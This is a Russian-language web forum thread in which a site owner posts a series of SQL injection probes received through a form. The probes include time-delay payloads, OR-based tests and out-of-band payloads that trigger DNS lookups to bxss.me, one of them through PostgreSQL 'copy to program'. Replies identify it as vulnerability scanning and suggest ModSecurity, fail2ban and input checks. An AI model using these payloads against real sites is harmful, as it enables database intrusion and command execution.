Атака на сайт с передачей через форму разного рода непонятных параметров? Чем это сулит?

85

Varenik

11 октября 2019, 12:05

4465

Приветствую, уважаемые гуру...

Сегодня на сайт началась атака и уже порядка 7 часов не прекращается...

Посредством обработчика одной из форм идут попытки записать в БД какую-то гадость посредством передачи POST запросом в значениях формы.

Периодически меняется идентификатор формы, в который подставляются данные. Ниже скину по очереди несколько значений которые подряд идут при каждой новой попытке. Подскажите, какая может быть цель у этих иродов исходя из кода, который пытаются передать через форму.


if(now()=sysdate(),sleep(420),0)/*\'XOR(if(now()=sysdate(),sleep(420),0))OR\'"XOR(if(now()=sysdate(),sleep(420),0))OR"*/

(select(0)from(select(sleep(420)))v)/*\'+(select(0)from(select(sleep(420)))v)+\'"+(select(0)from(select(sleep(420)))v)+"*/

-1; waitfor delay \'0:0:420\' -- 

-1); waitfor delay \'0:0:420\' -- 

1 waitfor delay \'0:0:420\' -- 

aUgtJ1Jh\'; waitfor delay \'0:0:140\' -- 

-1;select pg_sleep(140); -- 

-1);select pg_sleep(140); -- 

-1));select pg_sleep(140); -- 

NiwVY2Ly\';select pg_sleep(140); -- 

UCWUfdRh\');select pg_sleep(140); -- 

Zpn3BjsT\'));select pg_sleep(280); -- 

1||UTL_INADDR.get_host_address(\'dns.\'||\'sqli.013405.986-17533.986.f76fb.1.bxss\'||\'.me\')

\'||UTL_INADDR.get_host_address(\'dns.\'||\'sqli.013405.986-17534.986.f76fb.1.bxss\'||\'.me\')||\'

1;copy (select \'\') to program \'nslookup dns.sqli.\\013405.986-17535.986.f76fb.\\1.bxss.me\'

1\';copy (select \'\') to program \'nslookup dns.sqli.\\013405.986-17536.986.f76fb.\\1.bxss.me

836\'

1

1

-1 OR 2+306-306-1=0+0+0+1 -- 

-1 OR 2+46-46-1=0+0+0+1

-1\' OR 2+946-946-1=0+0+0+1 -- 

-1\' OR 2+246-246-1=0+0+0+1 or \'jM2wJpwt\'=\'

-1" OR 2+826-826-1=0+0+0+1 --

И того - 24 запроса в которых код по очереди как выше (каждая строка - код с последующей заявки) и далее по новой...

Что это за зверь не подскажите?

1076

Mik Foxi

11 октября 2019, 12:10

#1

Ищут уязвимости на вашем сайте.

Антибот, антиспам, веб файрвол, защита от накрутки поведенческих: https://antibot.cloud/ + партнерка, до 40$ с продажи.

V

85

Varenik

11 октября 2019, 12:15

#2

Ну это понятно как таково...

Если я правильно понимаю - это попытки найти дыры в PostgreSQL...

Меня смутил урл ___bxss.me. При переходе на него редиректит на сайт acunetix - AcuMonitor: Detecting XXE, Blind XSS, and SSRF Attacks.

---------- Добавлено 11.10.2019 в 16:32 ----------

И собственно основной вопрос - как можно обезопасить себя от подобного?

По сути с этой атакой проблема решена банально просто - айпишник с которого шло занес в блеклист и все. Но все же...

A

775

awasome

11 октября 2019, 22:53

#3

Это не поможет? http://networker.by/blokirovka-post-zaprosov-v-htaccess/

Была тема с post-запросами в 2013 году, спасались тогда блокировкой.

325

suffix

12 октября 2019, 04:54

#4

Поставить ModSecurity (как модуль Apache или nginx), затем в fail2ban настроить правило [modsecurity] - шаблон там уже есть и спать спокойно !

Клуб любителей хрюш (https://www.babai.ru)

1076

Mik Foxi

12 октября 2019, 06:45

#5

Антибот из моей подписи помогает в таких ситуациях.

529

Vladimir

12 октября 2019, 20:16

#6

Varenik:

И собственно основной вопрос - как можно обезопасить себя от подобного...

Что у вас за программист? Это, же азы, не допускать до обработчика всякую хрень.

- Заполняется это в любом случае програмно, то вначале проверка на бота ( не капча )

- Проверка полей формы и преобразование данных, до передачи обработчику

Аэройога ( https://vk.com/aeroyogadom ) Йога в гамаках ( https://vk.com/aero_yoga ) Аэройога обучение ( https://aeroyoga.ru ) и просто фото ( https://weandworld.com )

S

469

Sitealert

12 октября 2019, 20:26

#7

Nadejda:
Проверка полей формы и преобразование данных, до передачи обработчику

Глупости писать не надо.

Отпилю лишнее, прикручу нужное, выправлю кривое. Вытравлю вредителей.

529

Vladimir

12 октября 2019, 20:38

#8

Sitealert:
Глупости писать не надо.

Это у вас глупости, вам пришли данные на обработчик, проверьте их, и exit, если они нафиг не нужны

И, на бота, там же проверяется. Если умеете, только капчей проверять, то просто не умеете готовить (программить)

PS На десятках сайтах, ни капчи, ни спама, ни такой херни. И обработчики "самописом" писались лет 15 назад

S

469

Sitealert

12 октября 2019, 20:54

#9

Nadejda:
Это у вас глупости

Глупости – у тех кто их пишет, я глупостей не писал.

Не можешь внятно выразить свои мысли – лучше вообще ничего не пиши, чтобы у людей от такой писанины голова не пухла.

Nadejda:
пришли данные на обработчик, проверьте их

Так пришли или не пришли?

Nadejda:
Если умеете, только капчей проверять, то просто не умеете готовить (программить)

Кто здесь вообще что-то про капчу говорил? Тема вообще про другое.

Nadejda:
На десятках сайтах, ни капчи, ни спама, ни такой херни. И обработчики "самописом" писались лет 15 назад

Это великое достижение? Типо похвастаться надо?

529

Vladimir

13 октября 2019, 06:44

#10

Sitealert:
Так пришли или не пришли?

Пришли они или нет, придут или нет, у вас в любом случае должна быть проверка на входящие данные, и если вы этого не понимете, то какой из вас программист?

Пользоваться готовыми обработчиками, в которых даже не знаете, что проверяется, а что нет?

---------- Добавлено 13.10.2019 в 13:47 ----------

Sitealert:

Кто здесь вообще что-то про капчу говорил?

А, то что она у всех, и на 90 % не работает. А, проверив только на бота....на 90%, сработает exit, без дальнейшей проверки всех входящих данных

---------- Добавлено 13.10.2019 в 13:59 ----------

Varenik:
айпишник с которого шло занес в блеклист и все. Но все же...

Вы, умеете пользоваться прокси? Ну, бывает школота балуется с одного, но в основном Ip меняется, и уповать на блеклист не стоит.

eTarget 2011:Панельная дискуссия «Стратегия eTarget 2011: Круглый стол Могут ли «плохие» входящие

Как снизить ДРР до 4,38% и повысить продажи с помощью VK Рекламы

Яндекс Вебмастер вынес товарные фиды в отдельный раздел